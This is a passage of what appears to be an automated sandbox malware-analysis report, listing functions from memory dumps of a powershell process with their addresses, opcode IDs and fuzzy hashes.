                                                                                                                                                                  • Instruction Fuzzy Hash: 9CD12626A0EBC68FE796976C08695B97FE4DF57224B0840FBE14DC7193EC089C45C396
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA68456BB0, Relevance: .5, Instructions: 463COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1992dd1ea4e2be88d310760447965a37b4581d9de5be07fdd9693f24685a5462
                                                                                                                                                                  • Instruction ID: 589341432ef4fb752d6e2fb4ed3e74c0c1e6add87ae3c39d82a95b25aa4291db
                                                                                                                                                                  • Opcode Fuzzy Hash: 1992dd1ea4e2be88d310760447965a37b4581d9de5be07fdd9693f24685a5462
                                                                                                                                                                  • Instruction Fuzzy Hash: F1E1357190EB8A8FEB56DB6888595B97FE4EF47310B0841FBD24DCB193DA18AC05C352
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA684537A5, Relevance: .4, Instructions: 431COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2bf24ab03854e16d4516042ce2fa067d49a71d1b200b243cb33b94f90ce99eaa
                                                                                                                                                                  • Instruction ID: b2d8324844cba85d331948a5d679518f99e2be491803ed5c3236c9e0b7bb5727
                                                                                                                                                                  • Opcode Fuzzy Hash: 2bf24ab03854e16d4516042ce2fa067d49a71d1b200b243cb33b94f90ce99eaa
                                                                                                                                                                  • Instruction Fuzzy Hash: A0D1367190DB8A8FE796E76848596B9BBE4EF07314B0841FED54DCB193DA18EC01C342
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA6838588D, Relevance: .4, Instructions: 397COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 59507659ba26066072641baa7975ac0c01b80865c4d606f562499fbe7dec3704
                                                                                                                                                                  • Instruction ID: 65e9308b4cf1763dbffea7039b03fdf2c2e2a5e6cd38110ab31122f682dd953b
                                                                                                                                                                  • Opcode Fuzzy Hash: 59507659ba26066072641baa7975ac0c01b80865c4d606f562499fbe7dec3704
                                                                                                                                                                  • Instruction Fuzzy Hash: 35D17E75A08A4E8FDF95EF5CD495AE97BE1FF69300F1481B6D40ED7285CA24E8818B80
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA68456BC6, Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6240ef8e08c28feb7f424e85b7d25ffad2098fb1be406d4af5af99b510995f26
                                                                                                                                                                  • Instruction ID: 6dcbaaff677e9063304ac6a7b88bbe33f87ded73e4dff5d49d17fc5c9d790d50
                                                                                                                                                                  • Opcode Fuzzy Hash: 6240ef8e08c28feb7f424e85b7d25ffad2098fb1be406d4af5af99b510995f26
                                                                                                                                                                  • Instruction Fuzzy Hash: FDB1036190E7C68FE797876888695787FE5EF53210B0941FED24DCB193CA1C9C4AC352
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA683853DC, Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 363fded8200bbc9d5e8b2bbe888f1486cb0495f0a9cd850a3b74be619489d27e
                                                                                                                                                                  • Instruction ID: 53ba7e6fb65d43d3e08ef85df859727de4a88d11af6f9a6e4aa2358aa93a9295
                                                                                                                                                                  • Opcode Fuzzy Hash: 363fded8200bbc9d5e8b2bbe888f1486cb0495f0a9cd850a3b74be619489d27e
                                                                                                                                                                  • Instruction Fuzzy Hash: D351E62290D7C65FE706A768A8564F53FE0DF5336070941FBD48ECB193E809A886C796
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA6845085A, Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7ccf7752e67920d0e5bc7414c7b6c7812bfd54f4b9d47e06b604ee3754f16fe3
                                                                                                                                                                  • Instruction ID: c9abbe6334db1ab14a72b2cfbe0d433a522d38a9085f27452822705218c1cf09
                                                                                                                                                                  • Opcode Fuzzy Hash: 7ccf7752e67920d0e5bc7414c7b6c7812bfd54f4b9d47e06b604ee3754f16fe3
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E31E66AE1EB578FF6AAA36C04691BC57D4EF56318B4880FAD60DC72C7DC0CAC444386
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA683870B9, Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 874dd66ec9b75f2da2c8fa2cb785335468c2d37b595a17f7b76df8c6db63ae76
                                                                                                                                                                  • Instruction ID: d1dd69b97ae734a48a8abbeef97660a0e2cdf53dc53e0980f58dcadb57a213ef
                                                                                                                                                                  • Opcode Fuzzy Hash: 874dd66ec9b75f2da2c8fa2cb785335468c2d37b595a17f7b76df8c6db63ae76
                                                                                                                                                                  • Instruction Fuzzy Hash: EC210771A1890D8FDF94EF58C485EE977B2EF69304F5841A9D40DD7286CA24EC82CBC1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA683836D5, Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5af77b923cafdfc692f807d3b2e96efce3b7d3892af95e6571c26493b33afbc4
                                                                                                                                                                  • Instruction ID: 33e51ba52bc78b56e24f3136fb381150f35a4979552c2db63cb8eda312d80843
                                                                                                                                                                  • Opcode Fuzzy Hash: 5af77b923cafdfc692f807d3b2e96efce3b7d3892af95e6571c26493b33afbc4
                                                                                                                                                                  • Instruction Fuzzy Hash: 7701677111CB0C8FDB44EF0CE451AB5B7E0FB99324F10056DE59AC36A1D636E881CB45
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA68386DF8, Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 087ea20a3b1618ee240f9bd08de92a6d0c3892458b56cd94eb7881b6af97221d
                                                                                                                                                                  • Instruction ID: bbcfa858be5cf3ec664a6779ae877a3b1c1092074e72f937235213779c0ec14f
                                                                                                                                                                  • Opcode Fuzzy Hash: 087ea20a3b1618ee240f9bd08de92a6d0c3892458b56cd94eb7881b6af97221d
                                                                                                                                                                  • Instruction Fuzzy Hash: C9F0A73271C6054FDB4CEA0CF4029B573D1EB96320B00006EE48FC2296D917F8428785
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00007FFA68382337, Relevance: 2.8, Strings: 2, Instructions: 255COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: !U_^$[ U
                                                                                                                                                                  • API String ID: 0-3521920630
                                                                                                                                                                  • Opcode ID: fa6af7c9995e495e4b5d4510ce7fbc5f167682caba791dee279625c0307c8f25
                                                                                                                                                                  • Instruction ID: 0a2413d99c26cc697fca46b25853ddcb7eae1c3f2bb609848535bad74ecd5403
                                                                                                                                                                  • Opcode Fuzzy Hash: fa6af7c9995e495e4b5d4510ce7fbc5f167682caba791dee279625c0307c8f25
                                                                                                                                                                  • Instruction Fuzzy Hash: 4061A01BA1E2B659D701B778B85A1FE7F64CF83731B0441F7EA9C8D083A80861D683E5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA6838234A, Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: !U_^$[ U
                                                                                                                                                                  • API String ID: 0-3521920630
                                                                                                                                                                  • Opcode ID: 27ff105eceeff5788d1995335f4f7b9a404316f7a0b42e48be671fe50aa84d47
                                                                                                                                                                  • Instruction ID: 8e8ec3ac6c134e4c5917fe730ca19cc4ba3e35aea46c4fb121b0f49df2dd4d4d
                                                                                                                                                                  • Opcode Fuzzy Hash: 27ff105eceeff5788d1995335f4f7b9a404316f7a0b42e48be671fe50aa84d47
                                                                                                                                                                  • Instruction Fuzzy Hash: 9461A21BA1D2B659D701B778B85A1FE7F648F43731B0441F7EA9C8D087A80875C683E5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%